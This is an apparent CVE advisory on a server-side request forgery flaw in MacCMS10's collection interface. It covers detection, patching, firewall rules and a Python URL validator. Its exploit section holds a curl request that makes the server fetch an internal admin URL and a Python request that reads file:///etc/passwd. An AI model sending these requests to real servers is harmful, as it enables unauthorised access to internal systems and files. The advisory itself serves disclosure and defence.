How CVE-2025-28090 Works
MacCMS10 v2025.1000.4047 fails to properly validate user-supplied URLs in the Collection Custom Interface feature. Attackers can craft malicious requests to bypass access controls and force the server to send unauthorized HTTP requests to internal or external systems. This allows data exfiltration, internal network scanning, or abuse of trusted server permissions. The vulnerability stems from insufficient input sanitization when processing `url` parameters in API endpoints, enabling SSRF via manipulated GET/POST requests.
DailyCVE Form:
Platform: MacCMS10
Version: v2025.1000.4047
Vulnerability: SSRF
Severity: Critical
Date: 04/07/2025
What Undercode Say:
Exploit:
curl -X GET "http://target.com/api/collect?url=http://internal-server/admin"

import requests

exploit_url = "http://target.com/api/collect?url=file:///etc/passwd"
response = requests.get(exploit_url)
print(response.text)
Detection:
grep -r 'file_get_contents($_GET' /var/www/html/
(single quotes are required here: inside double quotes the shell would expand `$_GET` to an empty string and the pattern would match every `file_get_contents(` call)
Mitigation:
1. Patch to v2025.1000.5050 or later.
2. Implement input validation:
// Syntactic check only: rejects malformed URLs and URLs without a host,
// it does not decide whether the destination host itself is acceptable.
if (!filter_var($url, FILTER_VALIDATE_URL, FILTER_FLAG_HOST_REQUIRED)) {
    die("Invalid URL");
}
3. Restrict outbound requests via firewall:
iptables -A OUTPUT -p tcp --dport 80 -d 192.168.1.0/24 -j DROP
Analysis:
- CVSS 4.0 Vector: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H`
- Exploitability: Remote, low complexity.
- Impact: Confidentiality/Integrity/Availability compromise.
Tooling:
nmap --script http-ssrf target.com
SSRF Scanner:
import re

def check_ssrf(url):
    # Accepts only http/https URLs and explicitly rejects file:// URLs;
    # returns a plain bool rather than a match object.
    return bool(re.match(r"^(http|https)://", url)
                and not re.match(r"^file://", url))
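The scheme checks above (the PHP filter_var call in mitigation step 2 and check_ssrf) stop file:// but still let a URL such as http://internal-server/admin through. The following is an added example, not MacCMS code, of the pre-flight validation a collection `url` parameter needs: scheme allowlist, no embedded credentials, optional host allowlist, and every resolved address must be public. The endpoint name, the injectable `resolver` and the constructed DNS answers in the test are assumptions for offline use.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Only plain web schemes: this blocks file://, gopher://, dict://, etc.
ALLOWED_SCHEMES = {"http", "https"}


def _is_public_ip(ip: str) -> bool:
    """True only for globally routable unicast addresses."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def is_safe_collect_url(url, allowed_hosts=None, resolver=socket.getaddrinfo):
    """Pre-flight check for the collection `url` parameter (hypothetical helper).

    allowed_hosts: optional allowlist of upstream hostnames; the strongest
    control when the set of collection sources is known in advance.
    resolver: getaddrinfo-compatible callable, injectable for offline tests.
    """
    parts = urlsplit(url.strip())
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False
    host = parts.hostname
    # Reject a missing host and embedded credentials ("http://user:pw@host").
    if not host or parts.username or parts.password:
        return False
    if allowed_hosts is not None and host.lower() not in allowed_hosts:
        return False
    try:
        # Literal IPv4/IPv6 (brackets already stripped by urlsplit). Encoded
        # forms such as "0x7f.1" or "2130706433" raise ValueError here and fall
        # through to the resolver, which normalises them to 127.0.0.1.
        ipaddress.ip_address(host)
        candidates = [host]
    except ValueError:
        try:
            candidates = [info[4][0] for info in resolver(host, None)]
        except socket.gaierror:
            return False
    # Every resolved address must be public: a single internal A/AAAA record
    # is enough to reach the intranet, so require all() rather than any().
    return bool(candidates) and all(_is_public_ip(ip) for ip in candidates)
```

This is a check-time decision only; to close the DNS-rebinding window, the outbound client should connect to the address that passed validation rather than resolving the hostname a second time.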
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-28090
Extra Source Hub:
Undercode